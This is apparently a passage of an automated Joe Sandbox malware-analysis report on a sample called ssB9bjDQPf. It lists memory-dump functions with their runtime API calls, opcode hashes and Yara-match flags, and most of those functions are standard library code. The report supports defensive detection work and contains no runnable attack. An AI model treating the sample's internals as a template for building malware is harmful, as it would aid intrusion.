                                                    • _free.LIBCMT ref: 0043A451
                                                    • _free.LIBCMT ref: 0043A45C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                    • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                    • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                    • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                    Function 0252A5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0252A331: _free.LIBCMT ref: 0252A35A
                                                    • _free.LIBCMT ref: 0252A638
                                                      • Part of subcall function 025236D1: HeapFree.KERNEL32(00000000,00000000,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?), ref: 025236E7
                                                      • Part of subcall function 025236D1: GetLastError.KERNEL32(?,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?,?), ref: 025236F9
                                                    • _free.LIBCMT ref: 0252A643
                                                    • _free.LIBCMT ref: 0252A64E
                                                    • _free.LIBCMT ref: 0252A6A2
                                                    • _free.LIBCMT ref: 0252A6AD
                                                    • _free.LIBCMT ref: 0252A6B8
                                                    • _free.LIBCMT ref: 0252A6C3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                    • Instruction ID: 7c385a5e4c75c5d5eee42d7821b6eaa34aa306e6c60a8ed986af8846c204a63b
                                                    • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                    • Instruction Fuzzy Hash: DC11B131604B29BADE20B7B1CD45FCF779EFF86300F400824A299AA1D0DA68B41C4E88
                                                    Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                    • String ID:
                                                    • API String ID: 4227777306-0
                                                    • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                    • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                    • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                    • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                    Function 02502659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02500DA0,?,?,?,00000000), ref: 02502667
                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02500DA0,?,?,?,00000000), ref: 0250266D
                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02500DA0,?,?,?,00000000), ref: 0250269A
                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02500DA0,?,?,?,00000000), ref: 025026A4
                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02500DA0,?,?,?,00000000), ref: 025026B6
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025026CC
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 025026DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                    • String ID:
                                                    • API String ID: 4227777306-0
                                                    • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                    • Instruction ID: 1c3ca2c14dcf16fb4d55a22bd7a6c8aff68da076f579395c1fa92cb2ffeea5a1
                                                    • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                    • Instruction Fuzzy Hash: 3E017135501115A6D721BFA5EC8CFAB3B68BF82B52F600825F805D20A0EF24D9448AAC
                                                    Function 025024A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0250670B), ref: 025024B6
                                                    • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 025024C4
                                                    • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 025024D2
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0250670B), ref: 02502500
                                                    • GetProcAddress.KERNEL32(00000000), ref: 02502507
                                                    • GetLastError.KERNEL32(?,?,?,0250670B), ref: 02502522
                                                    • GetLastError.KERNEL32(?,?,?,0250670B), ref: 0250252E
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02502544
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02502552
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                    • String ID: kernel32.dll
                                                    • API String ID: 4179531150-1793498882
                                                    • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                    • Instruction ID: 0f824bf8693a6b878cc5d981fb135588c13b8e5cc88e8278a33772322328f1a3
                                                    • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                    • Instruction Fuzzy Hash: 13F086759003107FB7113B75BC9D91B7FADEE46A22720062AFC11E21D1EF75C941895C
                                                    Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw
                                                    • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                    • API String ID: 2005118841-3619870194
                                                    • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                    • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                    • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                    • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                    Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                    • _free.LIBCMT ref: 004311DD
                                                    • _free.LIBCMT ref: 004311F6
                                                    • _free.LIBCMT ref: 00431228
                                                    • _free.LIBCMT ref: 00431231
                                                    • _free.LIBCMT ref: 0043123D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorLast$_memcmp
                                                    • String ID:
                                                    • API String ID: 4275183328-0
                                                    • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                    • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                    • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                    • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                    Function 0252239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,025225EC,00000001,00000001,?), ref: 025223F5
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,025225EC,00000001,00000001,?,?,?,?), ref: 0252247B
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02522575
                                                    • __freea.LIBCMT ref: 02522582
                                                      • Part of subcall function 0252390E: RtlAllocateHeap.NTDLL(00000000,024FDAD7,00000000), ref: 02523940
                                                    • __freea.LIBCMT ref: 0252258B
                                                    • __freea.LIBCMT ref: 025225B0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1414292761-0
                                                    • Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                    • Instruction ID: 8ce27cbd4ad7c23c107e5cdbd417471e04d5ee5eeee84018339d24b65a7877db
                                                    • Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                    • Instruction Fuzzy Hash: B551F576700227ABDB258F64CC60EBE7BAAFB46714F558628FC04DA1D0DB74DC48CA58
                                                    Function 0251E419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __cftoe
                                                    • String ID:
                                                    • API String ID: 4189289331-0
                                                    • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                    • Instruction ID: 92aa710be37d0308c156f40d4373e570a2f8b2e2dbc5d67099d0d4df7ed2cf09
                                                    • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                    • Instruction Fuzzy Hash: 5251F832900206ABFF249F68CC43F6E7BA9BF89334F114259EC15921C1EB75D901CA6C
                                                    Function 0251302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02513051
                                                      • Part of subcall function 02508AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02508ABD
                                                    • SafeSQueue.LIBCONCRT ref: 0251306A
                                                    • Concurrency::location::_Assign.LIBCMT ref: 0251312A
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0251314B
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02513159
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                    • String ID:
                                                    • API String ID: 3496964030-0
                                                    • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                    • Instruction ID: f0d6a5a0da6935a98748f293538aa7d59306201a0d0b49b80d0a754c992005c7
                                                    • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                    • Instruction Fuzzy Hash: DF31D531A00612AFDB25EF65C894B7ABBF1FF84720F144599D80A9B291DB70E945CFC4
                                                    Function 02518F24 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 02518F77
                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 02518F90
                                                    • FindVITargetTypeInstance.LIBVCRUNTIME ref: 02518F97
                                                    • PMDtoOffset.LIBCMT ref: 02518FB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FindInstanceTargetType$Offset
                                                    • String ID:
                                                    • API String ID: 1467055271-0
                                                    • Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                    • Instruction ID: 64751833a2d3ad99ef7fd46b8063d82bd68a590db4cca5810e77224444bc0064
                                                    • Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                    • Instruction Fuzzy Hash: 8B21F772A042059FFF34DF68DC49E6D7BA6FB85750B14861AE91193280E731E901CA98
                                                    Function 024F5437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                    • String ID:
                                                    • API String ID: 1687354797-0
                                                    • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                    • Instruction ID: 610444a70ef3ac7f7b4ea625b5c3a15775df3a5b6107de331ee8b5d2b84420c3
                                                    • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                    • Instruction Fuzzy Hash: 64217E72C04208EADF55EBA9D844BDEBBF9AF89315F54401BE204B7280DB749A448A65
                                                    Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,73A6BB93), ref: 00428DE8
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                    • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,73A6BB93), ref: 00428E61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                    • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                    • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                    • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                    Function 02519041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,02519038,025169C9,02530907,00000008,02530C6C,?,?,?,?,02513CB2,?,?,0045A064), ref: 0251904F
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0251905D
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02519076
                                                    • SetLastError.KERNEL32(00000000,?,02519038,025169C9,02530907,00000008,02530C6C,?,?,?,?,02513CB2,?,?,0045A064), ref: 025190C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                    • Instruction ID: 0b40e98ec0f7aaa6e22df1ae0f7e3fafa047ee05b14c631fb2f8ebfa28087334
                                                    • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                    • Instruction Fuzzy Hash: 5601F73620A7126EB73927B4ECD8AB62B85FB45775B300339F530422E0EF128814898D
                                                    Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                    • int.LIBCPMT ref: 00404D7A
                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                    • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                    • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                    • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                    • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                    Function 024F4FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 024F4FCA
                                                    • int.LIBCPMT ref: 024F4FE1
                                                      • Part of subcall function 024FBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024FBFD4
                                                      • Part of subcall function 024FBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024FBFEE
                                                    • std::locale::_Getfacet.LIBCPMT ref: 024F4FEA
                                                    • std::_Facet_Register.LIBCPMT ref: 024F501B
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 024F5031
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024F504F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                    • Instruction ID: 50a5d381949d2cbe511a5bfb780b7ce9aa1188404771126ddeb57858d17b46a6
                                                    • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                    • Instruction Fuzzy Hash: 7411E0329002189FCB65EB64C844AAE7772BF84314F55011FE612AB2D0DB749A058FE4
                                                    Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                    • int.LIBCPMT ref: 0040C1B1
                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                    • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                    • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                    • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                    • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                    • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                    Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                    • int.LIBCPMT ref: 004054FA
                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                    • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                    • std::_Facet_Register.LIBCPMT ref: 00405534
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                    • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                    • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                    • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                    Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                    • int.LIBCPMT ref: 00405596
                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                    • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                    • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                    • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                    • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                    • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
